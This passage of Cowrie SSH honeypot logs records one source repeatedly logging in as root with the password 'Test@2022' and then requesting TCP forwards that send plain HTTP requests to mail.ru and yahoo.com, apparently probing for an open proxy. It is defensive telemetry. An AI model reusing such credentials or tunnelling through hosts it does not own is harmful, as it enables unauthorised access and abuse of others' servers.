{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.660890Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.923741Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23012,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23012","sensor":"my-vps","timestamp":"2025-08-31T03:44:44.977284Z","session":"50c31a91fa9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.030426Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13229,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13229","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.179040Z","session":"50c31a91fa9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.231755Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":17974,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17974","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.378964Z","session":"50c31a91fa9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.431536Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.484899Z","src_ip":"77.83.207.83","session":"50c31a91fa9e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44650,"dst_ip":"1.2.3.4","dst_port":22,"session":"08ac8c7d944b","protocol":"ssh","message":"New connection: 77.83.207.83:44650 (1.2.3.4:22) [session: 08ac8c7d944b]","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.533885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.534609Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.584235Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.833678Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9219,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:9219","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.884595Z","session":"08ac8c7d944b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:45.934615Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":7044,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7044","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.076570Z","session":"08ac8c7d944b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.126874Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":29972,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29972","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.268530Z","session":"08ac8c7d944b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.318836Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.369448Z","src_ip":"77.83.207.83","session":"08ac8c7d944b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44733,"dst_ip":"1.2.3.4","dst_port":22,"session":"c01084cebe9f","protocol":"ssh","message":"New connection: 77.83.207.83:44733 (1.2.3.4:22) [session: c01084cebe9f]","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.417877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.418886Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.468732Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.717163Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5640,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5640","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.767652Z","session":"c01084cebe9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.818158Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22790,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22790","sensor":"my-vps","timestamp":"2025-08-31T03:44:46.960153Z","session":"c01084cebe9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.009796Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":11834,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11834","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.152120Z","session":"c01084cebe9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.201876Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.252466Z","src_ip":"77.83.207.83","session":"c01084cebe9f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44823,"dst_ip":"1.2.3.4","dst_port":22,"session":"5195036a0721","protocol":"ssh","message":"New connection: 77.83.207.83:44823 (1.2.3.4:22) [session: 5195036a0721]","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.301225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.302001Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.352096Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.599652Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27182,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27182","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.650269Z","session":"5195036a0721"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.700315Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8260,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8260","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.840132Z","session":"5195036a0721"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:47.889982Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":3624,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3624","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.032130Z","session":"5195036a0721"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.082304Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.132846Z","src_ip":"77.83.207.83","session":"5195036a0721"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44887,"dst_ip":"1.2.3.4","dst_port":22,"session":"5767155fa457","protocol":"ssh","message":"New connection: 77.83.207.83:44887 (1.2.3.4:22) [session: 5767155fa457]","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.181792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.182775Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.232503Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.481180Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1974,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1974","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.531810Z","session":"5767155fa457"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.582307Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":3878,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:3878","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.724238Z","session":"5767155fa457"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.774198Z","src_ip":"77.83.207.83","session":"5767155fa457"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":25467,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25467","sensor":"my-vps","timestamp":"2025-08-31T03:44:48.916229Z","session":"5767155fa457"}
